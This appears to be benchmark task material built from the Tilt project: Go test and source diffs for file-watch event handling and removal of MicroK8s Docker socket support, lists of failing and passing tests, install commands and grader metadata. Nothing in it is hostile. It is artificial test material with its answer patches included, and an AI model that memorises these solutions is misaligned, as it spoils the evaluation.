ControllerFixture: f.Build(c), + ControllerFixture: f.WithRequeuer(c.requeuer).Build(c), st: st, fe: fe, fpm: fpm, diff --git a/internal/controllers/core/dockercomposelogstream/reconciler_test.go b/internal/controllers/core/dockercomposelogstream/reconciler_test.go index cbc2126d0..401a16bc5 100644 --- a/internal/controllers/core/dockercomposelogstream/reconciler_test.go +++ b/internal/controllers/core/dockercomposelogstream/reconciler_test.go @@ -11,7 +11,6 @@ import ( "github.com/tilt-dev/tilt/internal/container" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/docker" "github.com/tilt-dev/tilt/internal/dockercompose" "github.com/tilt-dev/tilt/pkg/apis/core/v1alpha1" @@ -173,10 +172,9 @@ func newFixture(t *testing.T) *fixture { dcCli := dockercompose.NewFakeDockerComposeClient(t, cfb.Context()) dCli := docker.NewFakeClient() r := NewReconciler(cfb.Client, cfb.Store, dcCli, dCli) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, nil) return &fixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).Build(r), r: r, dc: dCli, dcc: dcCli, diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index 946f2b7ff..ba392f531 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -19,7 +19,6 @@ import ( "github.com/tilt-dev/tilt/internal/controllers/core/filewatch/fsevent" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils/configmap" "github.com/tilt-dev/tilt/internal/testutils/tempdir" @@ -75,10 +74,8 @@ func newFixture(t *testing.T) *fixture { clock := clockwork.NewFakeClock() controller := NewController(cfb.Client, testingStore, fakeMultiWatcher.NewSub, timerMaker.Maker(), filewatches.NewScheme(), clock) - indexer.StartSourceForTesting(cfb.Context(), controller.requeuer, controller, nil) - return &fixture{ - ControllerFixture: cfb.Build(controller), + ControllerFixture: cfb.WithRequeuer(controller.requeuer).Build(controller), t: t, tmpdir: tmpdir, controller: controller, diff --git a/internal/controllers/core/kubernetesdiscovery/reconciler_test.go b/internal/controllers/core/kubernetesdiscovery/reconciler_test.go index 4baa012c7..a79cc5ed3 100644 --- a/internal/controllers/core/kubernetesdiscovery/reconciler_test.go +++ b/internal/controllers/core/kubernetesdiscovery/reconciler_test.go @@ -23,7 +23,6 @@ import ( "github.com/tilt-dev/tilt/internal/container" "github.com/tilt-dev/tilt/internal/controllers/apis/cluster" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/k8s" "github.com/tilt-dev/tilt/internal/timecmp" "github.com/tilt-dev/tilt/pkg/apis" @@ -722,10 +721,9 @@ func newFixture(t *testing.T) *fixture { cfb := fake.NewControllerFixtureBuilder(t) clients := cluster.NewFakeClientProvider(t, cfb.Client) pw := NewReconciler(cfb.Client, cfb.Scheme(), clients, rd, cfb.Store) - indexer.StartSourceForTesting(cfb.Context(), pw.requeuer, pw, nil) ret := &fixture{ - ControllerFixture: cfb.Build(pw), + ControllerFixture: cfb.WithRequeuer(pw.requeuer).Build(pw), r: pw, ctx: cfb.Context(), t: t, diff --git a/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go b/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go index e7232ca5a..b6f52988d 100644 --- a/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go +++ b/internal/controllers/core/podlogstream/podlogstreamcontroller_test.go @@ -558,11 +558,10 @@ func newPLMFixture(t testing.TB) *plmFixture { st := newPLMStore(t, out) podSource := NewPodSource(ctx, kClient, cfb.Client.Scheme(), clock) plsc := NewController(ctx, cfb.Client, cfb.Scheme(), st, kClient, podSource, clock) - indexer.StartSourceForTesting(cfb.Context(), plsc.podSource, plsc, nil) return &plmFixture{ t: t, - ControllerFixture: cfb.Build(plsc), + ControllerFixture: cfb.WithRequeuer(plsc.podSource).Build(plsc), kClient: kClient, plsc: plsc, ctx: ctx, diff --git a/internal/controllers/core/portforward/reconciler_test.go b/internal/controllers/core/portforward/reconciler_test.go index 079253f65..bf4801524 100644 --- a/internal/controllers/core/portforward/reconciler_test.go +++ b/internal/controllers/core/portforward/reconciler_test.go @@ -18,7 +18,6 @@ import ( "github.com/tilt-dev/tilt/internal/controllers/apis/cluster" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/pkg/apis" "github.com/tilt-dev/tilt/pkg/model" @@ -353,10 +352,9 @@ func newPFRFixture(t *testing.T) *pfrFixture { cfb := fake.NewControllerFixtureBuilder(t) clients := cluster.NewFakeClientProvider(t, cfb.Client) r := NewReconciler(cfb.Client, cfb.Scheme(), cfb.Store, clients) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, nil) return &pfrFixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).Build(r), t: t, st: cfb.Store, r: r, diff --git a/internal/controllers/indexer/list_test.go b/internal/controllers/indexer/list_test.go index b5a05ee37..a548252f0 100644 --- a/internal/controllers/indexer/list_test.go +++ b/internal/controllers/indexer/list_test.go @@ -1,4 +1,4 @@ -package indexer +package indexer_test import ( "context" @@ -11,6 +11,7 @@ import ( "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil" "github.com/tilt-dev/tilt/internal/controllers/fake" + "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/pkg/apis/core/v1alpha1" "github.com/tilt-dev/tilt/pkg/logger" ) @@ -57,10 +58,10 @@ func TestListOwnedBy(t *testing.T) { assert.NoError(t, c.Create(ctx, pls2a)) var plsList1 v1alpha1.PodLogStreamList - assert.NoError(t, ListOwnedBy(ctx, c, &plsList1, types.NamespacedName{Name: kd1.Name}, kd1.TypeMeta)) + assert.NoError(t, indexer.ListOwnedBy(ctx, c, &plsList1, types.NamespacedName{Name: kd1.Name}, kd1.TypeMeta)) assert.ElementsMatch(t, []v1alpha1.PodLogStream{*pls1a, *pls1b}, plsList1.Items) var plsList2 v1alpha1.PodLogStreamList - assert.NoError(t, ListOwnedBy(ctx, c, &plsList2, types.NamespacedName{Name: kd2.Name}, kd2.TypeMeta)) + assert.NoError(t, indexer.ListOwnedBy(ctx, c, &plsList2, types.NamespacedName{Name: kd2.Name}, kd2.TypeMeta)) assert.ElementsMatch(t, []v1alpha1.PodLogStream{*pls2a}, plsList2.Items) }
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Reconcile_Watches", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
[]
Method: ControllerFixtureBuilder.WithRequeuer(r source.Source) *ControllerFixtureBuilder Location: internal/controllers/fake/fixture.go Inputs: r – a source.Source implementation (typically a controller’s requeuer) that will be stored for later wiring into the test fixture. Outputs: Returns the same *ControllerFixtureBuilder (allowing chaining) with its internal `requeuer` field set. Description: Registers a requeuer with the fixture builder so that, when Build is called, the test controller can be wrapped with a mutex and the requeuer can be started for testing. Method: ControllerFixtureBuilder.WithRequeuerResultChan(ch chan indexer.RequeueForTestResult) *ControllerFixtureBuilder Location: internal/controllers/fake/fixture.go Inputs: ch – a buffered channel that will receive `indexer.RequeueForTestResult` values emitted by the test‑mode requeuer. Outputs: Returns the same *ControllerFixtureBuilder (allowing chaining) with its internal `requeuerResultChan` field set. Description: Supplies a channel for the test harness to observe requeue events generated by the controller’s requeuer during the test run. Function: NewLockedController(c controller) *LockedController Location: internal/controllers/fake/fixture.go Inputs: c – an implementation of the internal `controller` interface (i.e., a Tilt controller). Outputs: A *LockedController that embeds the original controller and a sync.Mutex. Description: Creates a wrapper that serialises calls to the underlying controller’s Reconcile method, preventing concurrent reconciliations in test environments. Method: LockedController.Reconcile(ctx context.Context, req reconcile.Request) (ctrl.Result, error) Location: internal/controllers/fake/fixture.go Inputs: ctx – the reconciliation context; req – the reconcile.Request identifying the object to reconcile. Outputs: (ctrl.Result, error) returned by the wrapped controller’s Reconcile after the mutex is released. Description: Locks the controller’s mutex, forwards the call to the underlying controller’s Reconcile, then unlocks, ensuring only one reconciliation runs at a time. Method: LockedController.CreateBuilder(mgr ctrl.Manager) (*builder.Builder, error) Location: internal/controllers/fake/fixture.go Inputs: mgr – a controller-runtime manager supplied during fixture construction. Outputs: The builder and error returned by the wrapped controller’s CreateBuilder. Description: Forwards builder creation to the underlying controller; required to satisfy the `controller` interface when the wrapped controller is used in tests.
Apache-2.0
{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 2, "num_modified_lines": 71, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding a mutex to avoid concurrent reconciliations, aiming to eliminate race conditions in tests. The provided patch introduces a LockedController with a mutex, extends the fixture builder with WithRequeuer helpers, and updates all affected tests to use the new fixture, aligning the test expectations with the fix. There are no signals of test suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge. Hence the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
59f9aa24c86dc5302772c61905275fd90675596f
2025-01-16 03:29:33
nicks: hmm..something weird is happening on mac that i have to look into...sadly, circleci turned off our mac runners and i haven't figured out how to fix them.
tilt-dev__tilt-6488
diff --git a/internal/controllers/core/filewatch/controller.go b/internal/controllers/core/filewatch/controller.go index 13309173c..5b66aedab 100644 --- a/internal/controllers/core/filewatch/controller.go +++ b/internal/controllers/core/filewatch/controller.go @@ -190,6 +190,10 @@ func (c *Controller) addOrReplace(ctx context.Context, name types.NamespacedName w.restartBackoff = existing.restartBackoff status.Error = existing.status.Error } + if hasExisting { + status.FileEvents = existing.status.FileEvents + status.LastEventTime = existing.status.LastEventTime + } ignoreMatcher := ignore.CreateFileChangeFilter(fw.Spec.Ignores) startFileChangeLoop := false diff --git a/internal/docker/client.go b/internal/docker/client.go index 4e224ec91..03e8018d1 100644 --- a/internal/docker/client.go +++ b/internal/docker/client.go @@ -69,10 +69,6 @@ var minDockerVersionExperimentalBuildkit = semver.MustParse("1.38.0") var versionTimeout = 5 * time.Second -// microk8s exposes its own docker socket -// https://github.com/ubuntu/microk8s/blob/master/docs/dockerd.md -const microK8sDockerHost = "unix:///var/snap/microk8s/current/docker.sock" - // Create an interface so this can be mocked out. type Client interface { CheckConnected() error diff --git a/internal/docker/env.go b/internal/docker/env.go index 14d0be15a..86e9bae28 100644 --- a/internal/docker/env.go +++ b/internal/docker/env.go @@ -246,21 +246,6 @@ func ProvideClusterEnv( } } - if product == clusterid.ProductMicroK8s && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { - // If we're running Microk8s with a docker runtime, talk to Microk8s's docker socket. - d, err := creator.FromEnvMap(map[string]string{"DOCKER_HOST": microK8sDockerHost}) - if err != nil { - return ClusterEnv{Error: fmt.Errorf("connecting to microk8s: %v", err)} - } - - // Handle the case where people manually set DOCKER_HOST to microk8s. - if hostOverride == "" || hostOverride == d.DaemonHost() { - env.Client = d - env.Environ = append(env.Environ, fmt.Sprintf("DOCKER_HOST=%s", microK8sDockerHost)) - env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) - } - } - if env.Client == nil { client, err := creator.FromCLI(ctx) env.Client = client @@ -274,8 +259,7 @@ func ProvideClusterEnv( // images) // // currently, we handle this by inspecting the Docker + K8s configs to see - // if they're matched up, but with the exception of microk8s (handled above), - // we don't override the environmental Docker config + // if they're matched up, but we don't override the environmental Docker config if willBuildToKubeContext(ctx, product, kubeContext, env) && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) diff --git a/internal/ospath/ospath.go b/internal/ospath/ospath.go index 618542fb4..2adb78e91 100644 --- a/internal/ospath/ospath.go +++ b/internal/ospath/ospath.go @@ -154,6 +154,15 @@ func IsDir(path string) bool { return f.Mode().IsDir() } +func IsDirLstat(path string) bool { + f, err := os.Lstat(path) + if err != nil { + return false + } + + return f.Mode().IsDir() +} + func IsBrokenSymlink(path string) (bool, error) { // Stat resolves symlinks, lstat does not. // So if Stat reports IsNotExist, but Lstat does not, diff --git a/internal/watch/watcher_darwin.go b/internal/watch/watcher_darwin.go index 785b70ad4..ba0014791 100644 --- a/internal/watch/watcher_darwin.go +++ b/internal/watch/watcher_darwin.go @@ -38,12 +38,19 @@ func (d *darwinNotify) loop() { e.Path = filepath.Join("/", e.Path) _, isPathWereWatching := d.pathsWereWatching[e.Path] - if e.Flags&fsevents.ItemIsDir == fsevents.ItemIsDir && isPathWereWatching { + isDir := e.Flags&fsevents.ItemIsDir == fsevents.ItemIsDir + if isDir && isPathWereWatching { // For consistency with Linux and Windows, don't fire any events // for directories that we're watching -- only their contents. continue } + // On MacOS, modifying a directory entry fires Created | InodeMetaMod + // Ignore these events, mod time modifications shouldnt trigger copies. + if isDir && (e.Flags&fsevents.ItemInodeMetaMod) == fsevents.ItemInodeMetaMod { + continue + } + ignore, err := d.ignore.Matches(e.Path) if err != nil { d.logger.Infof("Error matching path %q: %v", e.Path, err) diff --git a/internal/watch/watcher_naive.go b/internal/watch/watcher_naive.go index 00ca01174..e7b4482fc 100644 --- a/internal/watch/watcher_naive.go +++ b/internal/watch/watcher_naive.go @@ -151,16 +151,32 @@ func (d *naiveNotify) loop() { } if e.Op&fsnotify.Create != fsnotify.Create { - if d.shouldNotify(e.Name) { - d.wrappedEvents <- FileEvent{e.Name} + if !d.shouldNotify(e.Name) { + continue } + + // Don't send events for directories when the modtime is being changed. + // + // This is a bit of a hack because every OS represents modtime updates + // a bit differently and they don't map well to fsnotify events. + // + // On Windows, updating the modtime of a directory is a fsnotify.Write. + // On Linux, it's a fsnotify.Chmod. + isDirUpdateOnly := (e.Op == fsnotify.Write || e.Op == fsnotify.Chmod) && + ospath.IsDir(e.Name) + if isDirUpdateOnly { + continue + } + + d.wrappedEvents <- FileEvent{e.Name} continue } if d.isWatcherRecursive { - if d.shouldNotify(e.Name) { - d.wrappedEvents <- FileEvent{e.Name} + if !d.shouldNotify(e.Name) { + continue } + d.wrappedEvents <- FileEvent{e.Name} continue } @@ -223,8 +239,7 @@ func (d *naiveNotify) shouldNotify(path string) bool { if _, ok := d.notifyList[path]; ok { // We generally don't care when directories change at the root of an ADD - stat, err := os.Lstat(path) - isDir := err == nil && stat.IsDir() + isDir := ospath.IsDirLstat(path) if isDir { return false }
watch: tweak dir change events fixes https://github.com/tilt-dev/tilt/issues/6485 Signed-off-by: Nick Santos <nick.santos@docker.com>
**Title** Prevent unnecessary rebuilds caused by directory metadata changes and clean up MicroK8s Docker handling **Problem** File watchers were treating modifications to directory metadata (e.g., timestamp updates) as change events, leading to spurious rebuilds. Additionally, the Docker environment code contained legacy handling for MicroK8s that is no longer required. **Root Cause** The watcher logic did not differentiate between content changes and pure directory metadata changes, and the Docker setup used a hard‑coded socket path for MicroK8s that could interfere with normal Docker detection. **Fix / Expected Behavior** - Preserve existing file‑event status when updating watch controllers. - Ignore directory‑only metadata events on all platforms, ensuring only real file changes trigger rebuilds. - Introduce a reliable check for directories that follows symbolic links correctly. - Remove the obsolete MicroK8s Docker socket override, allowing standard Docker discovery to proceed. - Maintain correct ignore‑pattern handling and recursive watching behavior. **Risk & Validation** - Verify that legitimate file modifications still produce rebuilds across macOS, Linux, and Windows. - Confirm that directory timestamp updates no longer cause unnecessary events. - Run Docker integration tests to ensure the environment works without the MicroK8s special case. - Perform end‑to‑end tests on typical Tilt workflows to catch any regression in watch handling.
6,488
tilt-dev/tilt
diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index ba392f531..1afbe0c6e 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -324,13 +324,14 @@ func TestController_Reconcile_Watches(t *testing.T) { assert.Truef(t, updatedStart.After(originalStart), "Monitor start time should be more recent after update, (original: %s, updated: %s)", originalStart, updatedStart) - if assert.Equal(t, 2, len(updated.Status.FileEvents)) { + if assert.Equal(t, 3, len(updated.Status.FileEvents)) { // ensure ONLY the expected files were seen assert.NotZero(t, updated.Status.FileEvents[0].Time.Time) - mostRecentEventTime := updated.Status.FileEvents[1].Time.Time + mostRecentEventTime := updated.Status.FileEvents[2].Time.Time assert.NotZero(t, mostRecentEventTime) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[0].SeenFiles) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("a", "1")}, updated.Status.FileEvents[0].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[2].SeenFiles) assert.Equal(t, mostRecentEventTime, updated.Status.LastEventTime.Time) } } diff --git a/internal/docker/client_test.go b/internal/docker/client_test.go index e71b16a8d..99ec4d2f9 100644 --- a/internal/docker/client_test.go +++ b/internal/docker/client_test.go @@ -150,18 +150,6 @@ func TestProvideClusterProduct(t *testing.T) { Client: hostClient{Host: "tcp://192.168.99.100:2376"}, }, }, - { - env: clusterid.ProductMicroK8s, - runtime: container.RuntimeDocker, - expectedCluster: Env{ - Client: hostClient{Host: "unix:///var/snap/microk8s/current/docker.sock"}, - Environ: []string{"DOCKER_HOST=unix:///var/snap/microk8s/current/docker.sock"}, - BuildToKubeContexts: []string{"microk8s-me"}, - }, - expectedLocal: Env{ - Client: hostClient{Host: "unix:///var/run/docker.sock"}, - }, - }, { env: clusterid.ProductMicroK8s, runtime: container.RuntimeCrio, diff --git a/internal/watch/notify_test.go b/internal/watch/notify_test.go index 533bce175..d44316a7f 100644 --- a/internal/watch/notify_test.go +++ b/internal/watch/notify_test.go @@ -218,6 +218,24 @@ func TestWatchDirectoryAndTouchIt(t *testing.T) { f.assertEvents() } +func TestWatchDirectoryAndTouchSubdir(t *testing.T) { + f := newNotifyFixture(t) + + cTime := time.Now() + root := f.TempDir("root") + path := filepath.Join(root, "change") + a := filepath.Join(path, "a.txt") + f.WriteFile(a, "a") + + f.watch(root) + f.fsync() + + err := os.Chtimes(path, cTime, time.Now().Add(time.Minute)) + assert.NoError(t, err) + + f.assertEvents() +} + func TestWatchNonExistentPathDoesNotFireSiblingEvent(t *testing.T) { f := newNotifyFixture(t)
[ "TestController_Reconcile_Watches" ]
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 6, "num_modified_lines": 43, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/tilt-dev/tilt/issues/6485" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue asks to tweak how directory change events are handled by the file‑watch system. The test changes add a new test for sub‑directory timestamp changes and adjust expectations in existing controller tests, while the implementation adds logic to ignore directory mod‑time events on all platforms. The issue statement provides no concrete acceptance criteria, making the specification ambiguous (B4). The test suite also includes unrelated Docker environment cleanup, but the core change aligns with the intended watch behavior.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
59f9aa24c86dc5302772c61905275fd90675596f
2025-02-04 07:52:40
tilt-dev__tilt-6495
diff --git a/internal/controllers/core/filewatch/controller.go b/internal/controllers/core/filewatch/controller.go index 13309173c..5b66aedab 100644 --- a/internal/controllers/core/filewatch/controller.go +++ b/internal/controllers/core/filewatch/controller.go @@ -190,6 +190,10 @@ func (c *Controller) addOrReplace(ctx context.Context, name types.NamespacedName w.restartBackoff = existing.restartBackoff status.Error = existing.status.Error } + if hasExisting { + status.FileEvents = existing.status.FileEvents + status.LastEventTime = existing.status.LastEventTime + } ignoreMatcher := ignore.CreateFileChangeFilter(fw.Spec.Ignores) startFileChangeLoop := false diff --git a/internal/docker/client.go b/internal/docker/client.go index 4e224ec91..03e8018d1 100644 --- a/internal/docker/client.go +++ b/internal/docker/client.go @@ -69,10 +69,6 @@ var minDockerVersionExperimentalBuildkit = semver.MustParse("1.38.0") var versionTimeout = 5 * time.Second -// microk8s exposes its own docker socket -// https://github.com/ubuntu/microk8s/blob/master/docs/dockerd.md -const microK8sDockerHost = "unix:///var/snap/microk8s/current/docker.sock" - // Create an interface so this can be mocked out. type Client interface { CheckConnected() error diff --git a/internal/docker/env.go b/internal/docker/env.go index 14d0be15a..86e9bae28 100644 --- a/internal/docker/env.go +++ b/internal/docker/env.go @@ -246,21 +246,6 @@ func ProvideClusterEnv( } } - if product == clusterid.ProductMicroK8s && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { - // If we're running Microk8s with a docker runtime, talk to Microk8s's docker socket. - d, err := creator.FromEnvMap(map[string]string{"DOCKER_HOST": microK8sDockerHost}) - if err != nil { - return ClusterEnv{Error: fmt.Errorf("connecting to microk8s: %v", err)} - } - - // Handle the case where people manually set DOCKER_HOST to microk8s. - if hostOverride == "" || hostOverride == d.DaemonHost() { - env.Client = d - env.Environ = append(env.Environ, fmt.Sprintf("DOCKER_HOST=%s", microK8sDockerHost)) - env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) - } - } - if env.Client == nil { client, err := creator.FromCLI(ctx) env.Client = client @@ -274,8 +259,7 @@ func ProvideClusterEnv( // images) // // currently, we handle this by inspecting the Docker + K8s configs to see - // if they're matched up, but with the exception of microk8s (handled above), - // we don't override the environmental Docker config + // if they're matched up, but we don't override the environmental Docker config if willBuildToKubeContext(ctx, product, kubeContext, env) && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext))
docker: remove support for building to microk8s docker socket i think this feature was removed from microk8s years ago and we no longer need to support it. fixes https://github.com/tilt-dev/tilt/issues/6494 Signed-off-by: Nick Santos <nick.santos@docker.com>
**Title** Remove outdated MicroK8s Docker socket handling **Problem** Tilt tried to detect and switch to a special Docker socket when running on MicroK8s. That socket is no longer provided, causing unnecessary configuration changes and potential build failures. **Root Cause** Hard‑coded logic assumed a MicroK8s Docker daemon at a fixed path, which is obsolete. **Fix / Expected Behavior** - Eliminate the MicroK8s‑specific Docker host constant and all related conditional paths. - Stop overriding the Docker environment for MicroK8s clusters; rely on the default Docker configuration. - Preserve existing file‑watch status (file events and last event time) when a watch entry is updated. - Ensure regular Docker/Kubernetes environments continue to operate unchanged. - Simplify the cluster environment provisioning logic by removing the special case. **Risk & Validation** - Verify that builds and deployments work unchanged on standard Docker and non‑MicroK8s clusters. - Run the full test suite to confirm no regressions in file‑watch behavior. - Manually test on a current MicroK8s installation to ensure Tilt gracefully falls back to the default Docker socket.
6,495
tilt-dev/tilt
diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index ba392f531..1afbe0c6e 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -324,13 +324,14 @@ func TestController_Reconcile_Watches(t *testing.T) { assert.Truef(t, updatedStart.After(originalStart), "Monitor start time should be more recent after update, (original: %s, updated: %s)", originalStart, updatedStart) - if assert.Equal(t, 2, len(updated.Status.FileEvents)) { + if assert.Equal(t, 3, len(updated.Status.FileEvents)) { // ensure ONLY the expected files were seen assert.NotZero(t, updated.Status.FileEvents[0].Time.Time) - mostRecentEventTime := updated.Status.FileEvents[1].Time.Time + mostRecentEventTime := updated.Status.FileEvents[2].Time.Time assert.NotZero(t, mostRecentEventTime) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[0].SeenFiles) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("a", "1")}, updated.Status.FileEvents[0].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[2].SeenFiles) assert.Equal(t, mostRecentEventTime, updated.Status.LastEventTime.Time) } } diff --git a/internal/docker/client_test.go b/internal/docker/client_test.go index e71b16a8d..99ec4d2f9 100644 --- a/internal/docker/client_test.go +++ b/internal/docker/client_test.go @@ -150,18 +150,6 @@ func TestProvideClusterProduct(t *testing.T) { Client: hostClient{Host: "tcp://192.168.99.100:2376"}, }, }, - { - env: clusterid.ProductMicroK8s, - runtime: container.RuntimeDocker, - expectedCluster: Env{ - Client: hostClient{Host: "unix:///var/snap/microk8s/current/docker.sock"}, - Environ: []string{"DOCKER_HOST=unix:///var/snap/microk8s/current/docker.sock"}, - BuildToKubeContexts: []string{"microk8s-me"}, - }, - expectedLocal: Env{ - Client: hostClient{Host: "unix:///var/run/docker.sock"}, - }, - }, { env: clusterid.ProductMicroK8s, runtime: container.RuntimeCrio,
[ "TestController_Reconcile_Watches" ]
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
No new interfaces are introduced.
Apache-2.0
